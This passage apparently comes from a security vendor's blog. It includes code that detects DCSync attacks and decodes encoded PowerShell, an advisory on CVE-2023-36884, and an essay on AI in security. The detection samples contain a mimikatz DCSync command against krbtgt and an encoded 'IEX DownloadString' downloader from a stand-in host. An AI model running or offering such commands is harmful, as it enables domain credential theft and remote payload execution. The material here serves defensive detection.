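            cmd = e.get("CommandLine", "")
            if any(marker in cmd.lower() for marker in TOOL_MARKERS):
                reasons.append(f"DCSync tooling executed on {e['Computer']}: {cmd}")
        # Persistence: 5136 records a new nTSecurityDescriptor on the domain
        # object whose SDDL now carries the Get-Changes-All right.
        if (e["EventID"] == 5136
                and e.get("AttributeLDAPDisplayName") == "nTSecurityDescriptor"
                and e.get("ObjectDN", "").upper().startswith("DC=")
                and DS_REPLICATION_GET_CHANGES_ALL in e.get("AttributeValue", "").lower()):
            reasons.append(f"replication rights granted on {e['ObjectDN']} by {e['SubjectUserName']}")
        # Enumeration of Permissions: script block logging (4104) shows the
        # domain object's ACL being read before the sync.
        if e["EventID"] == 4104:
            text = e.get("ScriptBlockText", "")
            if "Get-DomainObjectAcl" in text or ("Get-Acl" in text and "AD:" in text):
                reasons.append("domain ACL enumerated from PowerShell")

    if reasons:
        return "active threat", reasons
    return "needs manual review", ["no corroborating activity within the window"]


# Constructed sample alert and events (not real logs).
T0 = datetime(2023, 8, 15, 14, 2, 0)
SAMPLE_ALERT = {"time": T0, "user": "CORP\\jdoe", "source_ip": "10.0.5.23"}
SAMPLE_EVENTS = [
    {"EventID": 4688, "time": T0 - timedelta(minutes=1), "Computer": "WS-0142",
     "SubjectUserName": "jdoe",
     "CommandLine": 'C:\\Temp\\m.exe "lsadump::dcsync /domain:corp.local /user:krbtgt" exit'},
    {"EventID": 5136, "time": T0 - timedelta(minutes=12), "Computer": "DC01",
     "SubjectUserName": "da-admin", "ObjectDN": "DC=corp,DC=local",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor",
     "AttributeValue": "O:DAG:DAD:(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;"
                       "S-1-5-21-1004336348-1177238915-682003330-1105)"},
    {"EventID": 4688, "time": T0 - timedelta(hours=3), "Computer": "WS-0142",
     "SubjectUserName": "jdoe", "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    verdict, why = triage_dcsync(SAMPLE_ALERT, SAMPLE_EVENTS)
    print(verdict)
    for r in why:
        print("  -", r)
```

The window is deliberately symmetric: the ACL grant that enables the attack comes before the 4662 event, while cleanup and lateral movement come after it. A request from a DC address short-circuits to a likely false positive without scanning, which matches the "Domain Controller Syncing" check being the cheapest one to make.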

To make DCSync attacks more difficult, be sure to carefully control the following privileges in Active Directory:

  • Replicating Directory Changes
  • Replicating Directory Changes All
  • Replicating Directory Changes In Filtered Set

By default these rights on the domain object are held only by the built-in administrative groups and the domain controllers' own groups. Any other principal that holds them, and any grant made outside change control, should be reviewed, and the accounts that legitimately hold them (backup and directory synchronization service accounts) should be documented so that the detection's allow list stays deliberate.

Battling PowerShell Attacks with Cybersecurity Automation

By: Krystal Rennie, Director of Corporate Communications 

In today's digital age, there are many ways we use computer systems to carry out everyday tasks. From browsing the internet to sending email, much of that work is automated, and the same automation leaves trails and tooling that cybercriminals can turn against your organization.

According to Microsoft, PowerShell is “a cross-platform task automation solution made up of a command-line shell, a scripting language, and a configuration management framework. PowerShell runs on Windows, Linux, and macOS.” It provides an interface for system administrators and users to carry out various tasks like running files, taking screenshots on the computer, accessing the internet, and more. 

This blog will explore how cybercriminals can use PowerShell, why they are so hard to detect, and how you can ensure your organization remains vigilant against attackers.  

PowerShell Attacks in Action   

To put it simply, PowerShell is present by default on every supported Windows computer, so it is an easy entry point for cybercriminals to abuse: they do not have to bring their own tools. System administrators depend on it and many Windows management components are built on it, so it cannot realistically be removed; it can only be constrained.

Cybercriminals abuse PowerShell as a living-off-the-land tactic. They can use it to stage a malware implant in memory, or to download and execute additional malware. Once they have access to your network, they can run commands through it and remain under the radar, because the activity looks like routine administration.

For example, an attacker can get PowerShell running through a simple spear-phishing email carrying a PDF or Word document as an attachment. When the document is opened, embedded code (typically a macro) launches PowerShell, which then downloads the additional malware stages to infect the computer.

Cybercriminals do not go out of their way to reinvent the wheel when planning their attacks; where there is an easy point of entry, they will use it to their advantage. Opening an attachment is a common task for employees, and cybercriminals know that. Using familiar techniques like the above is a perfect way to lure in potential victims and gain access to organizational data.  

Why are PowerShell Attacks Difficult to Detect?  

As attackers advance their techniques, they also recognize that to maintain success, they must keep their tactics simple yet effective. Below are a few reasons PowerShell attacks are hard to detect: 

  1. Easy Access to Windows API: PowerShell can call .NET and Windows APIs directly, so cybercriminals can carry out the same automated and administrative tasks as an IT team, through a signed Microsoft binary that application allow-listing rarely blocks.
  2. Living-off-the-Land: PowerShell is a powerful shell that does whatever it is told. Because it is native to every Windows computer, cybercriminals need less preparation and fewer dropped files, and they execute faster.
  3. Hiding in Plain Sight: Cybercriminals often Base64-encode their PowerShell (the -EncodedCommand switch) so that the command line appears as a string of letters and numbers. Security tooling that matches on keywords misses it unless the command is decoded first, and attackers nest several layers of encoding and compression to make that harder.
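To make the third point concrete, here is an added example (not Adlumin's or Microsoft's code) that recovers the script behind -EncodedCommand and scores it for the tradecraft described above. It handles PowerShell's abbreviated switch names (-e, -ec, -enc and longer prefixes), decodes the UTF-16LE base64 payload, peels a second encoded layer if one is nested inside the first, and then matches indicators across every layer. The sample command lines and the indicator list are constructed for the example.

```python
"""Added example (not Adlumin's code): recover the script hidden behind
PowerShell's -EncodedCommand switch and score it for common attacker
tradecraft. The sample command lines below are constructed for the example,
and INDICATORS is an illustrative list, not a definitive signature set.
"""
import base64
import re

# PowerShell accepts -e, -ec and any prefix of -EncodedCommand of three or
# more letters; try the longest spellings first so "-enc" is not cut to "-e".
_PREFIXES = ["e", "ec"] + ["encodedcommand"[:n] for n in range(3, 15)]
ENC_SWITCH = re.compile(
    r"(?:^|\s)[-/](?:" + "|".join(sorted(_PREFIXES, key=len, reverse=True))
    + r")\s+([A-Za-z0-9+/=]+)",
    re.I,
)

# (regex, description) pairs matched against the command line and every
# decoded layer; an assumed starter list, not a complete one.
INDICATORS = [
    (r"\biex\b|invoke-expression", "executes dynamically built code"),
    (r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", "downloads from the network"),
    (r"frombase64string", "carries a further base64 layer"),
    (r"-w(?:indowstyle)?\s+hidden", "hides the console window"),
    (r"-nop\b|-noprofile", "skips the user profile"),
    (r"-ep\s+bypass|-executionpolicy\s+bypass", "bypasses execution policy"),
    (r"gzipstream|deflatestream", "decompresses an embedded payload"),
]


def encode_command(script):
    """Produce the -EncodedCommand form PowerShell expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline, max_layers=3):
    """Peel up to max_layers of -EncodedCommand and return the decoded scripts,
    outermost first. An empty list means no valid encoded command was found."""
    layers = []
    text = cmdline
    for _ in range(max_layers):
        match = ENC_SWITCH.search(text)
        if not match:
            break
        try:
            raw = base64.b64decode(match.group(1), validate=True)
            script = raw.decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            break  # not really an encoded command (bad padding, odd length)
        layers.append(script)
        text = script  # look for another encoded layer inside this one
    return layers


def assess(cmdline):
    """Decode the command line and report which indicators fire across all layers."""
    layers = decode_encoded_command(cmdline)
    # Replace each base64 blob with a placeholder so indicators are matched on
    # readable text only, never on the blob itself.
    readable = [ENC_SWITCH.sub(" -encodedcommand <b64>", p) for p in [cmdline] + layers]
    haystack = " ".join(readable).lower()
    hits = sorted({desc for pattern, desc in INDICATORS if re.search(pattern, haystack)})
    return {
        "encoded": bool(layers),
        "layers": len(layers),
        "script": layers[-1] if layers else "",
        "indicators": hits,
        "score": len(hits),
    }


# Constructed samples: a two-layer encoded downloader and a benign scheduled script.
INNER = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/stage2.ps1')"
OUTER = f"powershell -w hidden -nop -enc {encode_command(INNER)}"
SAMPLE_CMDLINE = f"powershell.exe -ep bypass -EncodedCommand {encode_command(OUTER)}"
BENIGN_CMDLINE = "powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1"

if __name__ == "__main__":
    for line in (SAMPLE_CMDLINE, BENIGN_CMDLINE):
        result = assess(line)
        print(result["layers"], result["score"], result["indicators"])
        print("  ->", result["script"] or line)
```

The decoder stops at the first layer that fails to decode, so a truncated command line (a common artefact of logs that cap field length) is reported as unencoded rather than crashing the pipeline; in production that truncation is itself worth alerting on. Script block logging (event 4104) sidesteps the problem entirely, because it records the script after PowerShell has decoded it.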

Although detection can be tricky when looking at PowerShell as an attack method, with proper tools in place, such as an automated security solution with threat intelligence, it is not impossible. 

For example, Adlumin's Threat Research team recently uncovered "PowerDrop," a malicious PowerShell script that has set its sights on the U.S. aerospace industry. The malware uses deception, encoding, and encryption to evade detection. The threat was detected by Adlumin's machine learning-based algorithms, which analyze PowerShell commands and arguments at run time. In essence, the malware is used to run remote commands against victim networks after the attacker has gained initial access to, execution on, and persistence in the victim's servers.

Implementing an automated security solution with a multi-layer detection approach is the key to successfully uncovering attackers’ actions in your network and protecting your organization before chaos hits.  With the proper solution malicious behavior can be detected, alerted and responded to in real-time.  

Test Your Defenses: PowerShell Attack Simulator Tool 

Ensuring your organization has the proper tools and proactive measures to protect against PowerShell attacks is essential. Specifically, testing your environment for PowerShell-based attacks. As automation, cybersecurity, and the digital landscape evolve, cybercriminals will only become more advanced in planning their attacks. 

Adlumin has developed a free tool for security teams to test their defenses against common ways attackers gain access. PowerShell is a common tool attackers leverage to infiltrate an environment. The simulation runs through multiple ways PowerShell may be used maliciously so that you can gain visibility into your coverage against these threats.  

See how your security stands against the tactics and tricks used by cybercriminals. Download Adlumin’s free PowerShell Attack Simulator tool today or contact one of our cybersecurity experts for a demo and more information. 

New Microsoft Vulnerability Exploited by Storm-0978: What You Need to Know

Microsoft has issued a warning about an active phishing campaign that lures users into opening Microsoft Word attachments sent via email. Microsoft first identified the campaign in June 2023.

The attackers, a Russia-based cybercriminal group tracked as Storm-0978, are exploiting CVE-2023-36884, a zero-day remote code execution vulnerability, by sending victims phishing emails with Microsoft Word attachments that deploy a backdoor similar to the RomCom Remote Access Trojan (RAT). The malicious code runs when the victim opens the file, giving the threat actors access to the victim's system.

According to Microsoft, customers using Microsoft Defender for Office 365, and those using Microsoft 365 Apps (Versions 2302 or later), are protected from this attack chain. Adlumin advises other organizations to contact their MDR team for help applying the mitigation steps Microsoft recommends.

This remote code execution vulnerability is one of several that were being exploited in the wild as of this writing, including:

  • Windows SmartScreen Security Feature Bypass (CVE-2023-32049)  
  • Windows MSHTML Platform Elevation of Privilege (CVE-2023-32046)  
  • Windows Error Reporting Service Elevation of Privilege (CVE-2023-36874)  
  • Microsoft Outlook Security Feature Bypass (CVE-2023-35311)  

According to reports, Microsoft addressed at least 132 new security vulnerabilities in this release, many of them with high or critical CVSS scores.

The Phishing Campaign  

Users should remain alert when receiving emails with messages related to the conflict in Ukraine, according to Microsoft Threat Intelligence.   

The phishing campaign has often been directed at defense and government entities in Europe and North America, with lures referencing the "Ukrainian World Congress." Storm-0978 has also targeted financial companies with ransomware.

The Adlumin Response   

Adlumin is monitoring to ensure that any necessary patches or workarounds are implemented as soon as they become available.  

In the meantime, we recommend that organizations remain vigilant, follow best practices to enhance your security posture, and exercise caution with email attachments and links. We also recommend the following: 

  • Educate and raise awareness among employees about the potential risks of opening unknown or suspicious files and encourage them to report suspicious activity.  
  • Remain cautious when opening email attachments or clicking on links, especially if they come from unknown or suspicious sources.
  • Invest in a security operations platform that continually searches for and alerts on suspicious executions that may result from exploitation of the vulnerability.
  • Invest in a continuous vulnerability management product to regularly scan your environment to identify vulnerabilities and misconfigurations.  

The Intersection of AI and Cybersecurity: A Closer Look

By: Mark Sangster, VP, Chief of Strategy

Having successfully launched an unprecedented and remarkably influential technology, its visionary creator composed a significant letter that intensified the ethical and existential dilemmas associated with his groundbreaking innovation.

It’s reasonable to assume that I’m referring to the recent open letter published by the Center for AI Safety (CAIS) that was signed by known artificial intelligence (AI) experts, including Sam Altman, the CEO of OpenAI, and by the “Godfather of AI,” Geoffrey Hinton.

The letter’s dire warning made headlines with this:

“Mitigating the risk of extinction from AI should be a global priority alongside other societal-scale risks such as pandemics and nuclear war.” 

But you’d be wrong. I was actually referring to a letter written over 75 years earlier by J. Robert Oppenheimer to then-U.S. President Harry Truman on the existential risk of nuclear weapons.

When I prompted ChatGPT to compare the two letters, it returned the following:  

By 1946, after the bombings of Hiroshima and Nagasaki in Japan, nuclear weapons had demonstrated the consequences of atomic warfare. Oppenheimer's fears were grounded in fact.

The CAIS letter, however, is more like a predictive warning of where AI is headed, and what a dystopian future could look like.

Beyond the existential fears, there are consequences that are more likely to occur with the advent of AI and ChatGPT, such as job transformation in customer support, manufacturing, logistics, and data analysis.

Like other forms of technology before it, AI expands the gap between the knowers and the users. It is a black box in most cases, with a powerful handful of people who understand its mechanics, and this lack of transparency could lead to manipulation and political offenses.

What happens in a world of generative AI where the generated content becomes the data source from which AI develops new content? Is this an existential race condition leading to a runaway skewing of reality?

The Evolution of AI

These proximal fears may be more likely to manifest than the existential fears of destruction. We are much closer to the dawn of AI than to its future sunset.

In terms of AI development over the last quarter century, the technology has advanced from reactive AI such as when IBM Deep Blue beat chess expert, Garry Kasparov in 1997, to limited memory or deep learning AI such as chatbots, self-driving vehicles, and generative AI such as ChatGPT. In terms of evolution, limited AI is a long way from self-aware, and super intelligence, but it’s good at learning and performing specific tasks.

Existential fears of AI stem more from future stages, like The Theory of Mind in which AI learns empathy and understands the entities it interacts with. Beyond empathy, self-aware AI possesses its own emotions, needs, and desires. This kind of general AI and even super intelligence could lead to self-preservation instincts and pose a threat to humanity.

When we can expect to see the emergence of self-aware superintelligence is anyone's guess. Right now, it is a bit more like watching the first hominid use a stick as a tool than predicting the exact date of the first atomic detonation. I did ask ChatGPT, and this was the response:

For now, it’s “carpe diem” or seizing the day when it comes to AI.

AI in Cybersecurity

Recently, Deborah Snyder, a senior fellow with the Center for Digital Government, invited me to a webinar to discuss artificial intelligence trends in cybersecurity. We couldn't ignore the parallels between the two historical warnings, but our focus was more on today than tomorrow.

In terms of cybersecurity, criminals leverage AI to sabotage defenses, accelerate the development of their tactics and tools like phishing lures, and even lie dormant in the hands of an advanced persistent threat (APT) that’s playing a long game deploying an AI mole in the halls of government or in the defense industry.

But it’s not all dystopian on the cybersecurity front. AI automation solves big data problems and provides a scalable, cost-effective solution for security operations. According to my co-contributor, ChatGPT:

Given that most organizations face increasing cyber threats and compliance demands with diminishing budgets and exhausted resources, AI offers a complementary solution to human-based security operations.

Adlumin’s AI Advancements

From the start, Adlumin invested heavily in the use of artificial intelligence and machine learning (ML), as well as augmented user and entity behavior analytics (UEBA).

The precursors to business-disrupting incidents are buried in an avalanche of false-positive alerts and camouflaged within legitimate activity logs and events. Adlumin's machine learning algorithms streamline security operations, ingesting billions of data points to identify critical anomalous behaviors and present your security team with the timely information necessary to respond quickly. Adlumin leverages graph-theory metrics and cluster analysis, including principal component analysis, k-nearest neighbors (KNN), and the cluster-based local outlier factor (CBLOF).

Machine learning also drives our risk management services including continuous vulnerability management (CVM), progressive penetration testing (attack simulation), a proactive security awareness program, and multi-layered total ransomware defense.

Determining How to Use AI in Your Organization

Here are the top five simple ways to include AI into your security operations center (SOC) and the benefits they bring:

  1. AI-powered Threat Intelligence: Integrate AI-driven threat intelligence tools into your SOC to enhance threat detection and response capabilities. These tools can analyze vast amounts of data from various sources and automatically identify patterns, indicators of compromise, and emerging threats. By leveraging AI-powered threat intelligence, you can stay ahead of cybercriminals, detect advanced threats faster, and proactively protect your organization’s assets.
  2. Automated Log Analysis: Utilize AI-based log analysis solutions to automate the detection of security events and anomalies in your network logs. AI algorithms can sift through mountains of log data, identifying suspicious activities and potential security incidents. By automating log analysis, you free up your SOC team’s time and improve their efficiency, allowing them to focus on critical tasks and respond swiftly to genuine threats.
  3. Security Orchestration and Automation: Implement AI-driven security orchestration and automation platforms to streamline and optimize incident response workflows. These platforms can integrate with various security tools, allowing for automated incident triage, response, and remediation. By automating routine tasks, you reduce manual errors, accelerate incident response times, and enable your team to handle a higher volume of incidents effectively.
  4. Behavior-based Anomaly Detection: Deploy AI-powered behavior-based anomaly detection systems to detect unusual activities and potential insider threats. These systems can analyze user behavior, network traffic, and endpoint activities to establish baselines of normal behavior. When deviations occur, the AI algorithms can raise alerts, helping you detect suspicious behavior and mitigate the risks associated with insider threats promptly.
  5. Machine Learning-based User Authentication: Utilize AI and machine learning algorithms for user authentication and access control. By implementing intelligent authentication systems, you can detect and prevent unauthorized access attempts based on user behavior patterns. This approach strengthens your security posture, reduces the risk of account compromise, and enhances user experience by minimizing friction during the authentication process.

By including AI in your SOC through these simple methods, you can enjoy several benefits. These include improved threat detection accuracy, faster incident response, reduced manual effort, enhanced anomaly detection capabilities, and increased overall efficiency. AI empowers your SOC team with advanced tools and automation, enabling them to focus on high-value tasks and better protect your organization against ever-evolving cyber threats.

[Clears throat nervously] I couldn’t have said it better myself, ChatGPT.

What’s Next for AI?

Science fiction provides a neutral forum in which we can explore the dark potential of technology. In one such TV show, Caprica, we see the pivotal moment of discovery in this sci-fi world.

Caprica is set nearly 60 years before the AI apocalypse of the re-imagined 2004 series, Battlestar Galactica, and covers the period in which artificial intelligence becomes self-aware. It’s the ground zero breakthrough that would ultimately lead to the destruction of mankind in this science fiction world.

This kind of self-inflicted extinction is predicted by what is called the Great Filter theory. The notion is that lifeforms face moments of extinction through pandemics, natural disasters, or runaway technology. The real trick when it comes to AI's existential threat is knowing which side of this particular filter we are on. Did we safely pass through this filter, or is it still looming in our future as a harbinger of doom?

We have lived with nuclear annihilation for decades and haven’t yet fulfilled that apocalyptic prediction. Perhaps we can do the same with artificial intelligence. Regardless, AI today offers promise and direct operational benefits in terms of cybersecurity operations. At Adlumin, we intend to continue our AI investments to protect our customers from ever-evolving cyber threats.